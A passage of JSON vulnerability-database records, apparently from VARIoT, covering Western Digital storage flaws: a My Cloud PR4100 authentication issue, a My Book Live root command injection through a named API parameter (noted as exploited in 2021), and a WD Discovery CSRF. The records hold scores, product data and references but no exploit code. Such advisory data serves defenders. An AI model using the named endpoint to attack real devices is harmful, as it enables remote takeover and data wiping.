"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-12T00:00:00",
"db": "VULHUB",
"id": "VHN-108595"
},
{
"date": "2017-12-12T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"date": "2018-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"date": "2017-12-12T18:29:00.230000",
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"date": "2017-12-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-28T00:00:00",
"db": "VULHUB",
"id": "VHN-108595"
},
{
"date": "2019-05-28T00:00:00",
"db": "VULMON",
"id": "CVE-2017-17560"
},
{
"date": "2018-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011514"
},
{
"date": "2019-05-28T15:08:19.263000",
"db": "NVD",
"id": "CVE-2017-17560"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital My Cloud PR4100 Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011514"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-409"
}
],
"trust": 0.6
}
}
VAR-201906-0768
Vulnerability from variot - Updated: 2023-12-18 13:13Western Digital WD My Book Live and WD My Book Live Duo (all versions) have a root Remote Command Execution bug via shell metacharacters in the /api/1.0/rest/language_configuration language parameter. It can be triggered by anyone who knows the IP address of the affected device, as exploited in the wild in June 2021 for factory reset commands,. Remote attackers can use this vulnerability to execute commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0768",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my book live",
"scope": "eq",
"trust": 1.0,
"vendor": "westerndigital",
"version": "*"
},
{
"model": "wd my book live",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "digital wd my book live",
"scope": null,
"trust": 0.6,
"vendor": "western",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_book_live_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_book_live:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-18472"
}
]
},
"cve": "CVE-2018-18472",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-18472",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-46467",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-129035",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-18472",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-18472",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2021-46467",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-1324",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-129035",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-18472",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital WD My Book Live and WD My Book Live Duo (all versions) have a root Remote Command Execution bug via shell metacharacters in the /api/1.0/rest/language_configuration language parameter. It can be triggered by anyone who knows the IP address of the affected device, as exploited in the wild in June 2021 for factory reset commands,. Remote attackers can use this vulnerability to execute commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "VULMON",
"id": "CVE-2018-18472"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-18472",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2021-46467",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-129035",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-18472",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"id": "VAR-201906-0768",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
}
]
},
"last_update_date": "2023-12-18T13:13:23.521000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.wdc.com"
},
{
"title": "notes",
"trust": 0.1,
"url": "https://github.com/odolezal/notes "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/zero-day-wipe-my-book-live/167422/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/hackers-use-zero-day-to-mass-wipe-my-book-live-devices/"
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2021/06/25/western_digital_nas_wiped/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.wizcase.com/blog/hack-2018/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18472"
},
{
"trust": 1.8,
"url": "https://www.westerndigital.com/support/productsecurity/wdc-21008-recommended-security-measures-wd-mybooklive-wd-mybookliveduo"
},
{
"trust": 1.8,
"url": "https://community.wd.com/t/action-required-on-my-book-live-and-my-book-live-duo/268147"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18472"
},
{
"trust": 0.6,
"url": "https://www.wdc.com"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://github.com/odolezal/notes"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/zero-day-wipe-my-book-live/167422/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "VULHUB",
"id": "VHN-129035"
},
{
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"date": "2019-06-19T00:00:00",
"db": "VULHUB",
"id": "VHN-129035"
},
{
"date": "2019-06-19T00:00:00",
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"date": "2019-06-19T16:15:10.703000",
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"date": "2018-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-129035"
},
{
"date": "2021-06-25T00:00:00",
"db": "VULMON",
"id": "CVE-2018-18472"
},
{
"date": "2019-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015725"
},
{
"date": "2021-06-25T10:15:08.137000",
"db": "NVD",
"id": "CVE-2018-18472"
},
{
"date": "2021-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Western Digital WD My Book Live operating system command injection vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46467"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-1324"
}
],
"trust": 0.6
}
}
VAR-202005-0339
Vulnerability from variot - Updated: 2023-12-18 13:12The Western Digital WD Discovery application before 3.8.229 for MyCloud Home on Windows and macOS is vulnerable to CSRF, with impacts such as stealing data, modifying disk contents, or exhausting disk space. (DoS) It may be put into a state. Western Digital MyCloud Home is a personal storage device from Western Digital. Western Digital WD Discovery is a remote connection management tool for Western Digital personal storage devices. Attackers can use this vulnerability to obtain data, modify the contents of the disk, or run out of disk space and other hazards
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202005-0339",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wd discovery",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "3.8.229"
},
{
"model": "wd discovery",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "3.8.229"
},
{
"model": "digital western digital wd discovery",
"scope": "lt",
"trust": 0.6,
"vendor": "western",
"version": "3.8.229"
},
{
"model": "wd discovery",
"scope": "eq",
"trust": 0.1,
"vendor": "westerndigital",
"version": "2.12.127"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:westerndigital:wd_discovery:*:*:*:*:*:my_cloud_home:*:*",
"cpe_name": [],
"versionEndExcluding": "3.8.229",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12427"
}
]
},
"cve": "CVE-2020-12427",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-005409",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-25951",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-12427",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-005409",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-12427",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-005409",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-25951",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202005-716",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-12427",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Western Digital WD Discovery application before 3.8.229 for MyCloud Home on Windows and macOS is vulnerable to CSRF, with impacts such as stealing data, modifying disk contents, or exhausting disk space. (DoS) It may be put into a state. Western Digital MyCloud Home is a personal storage device from Western Digital. Western Digital WD Discovery is a remote connection management tool for Western Digital personal storage devices. Attackers can use this vulnerability to obtain data, modify the contents of the disk, or run out of disk space and other hazards",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-12427",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-25951",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-12427",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-25951"
},
{
"db": "VULMON",
"id": "CVE-2020-12427"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005409"
},
{
"db": "NVD",
"id": "CVE-2020-12427"
},
{
"db": "CNNVD",
"id": "CNNVD-202005-716"
}
]
},
"id": "VAR-202005-0339",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
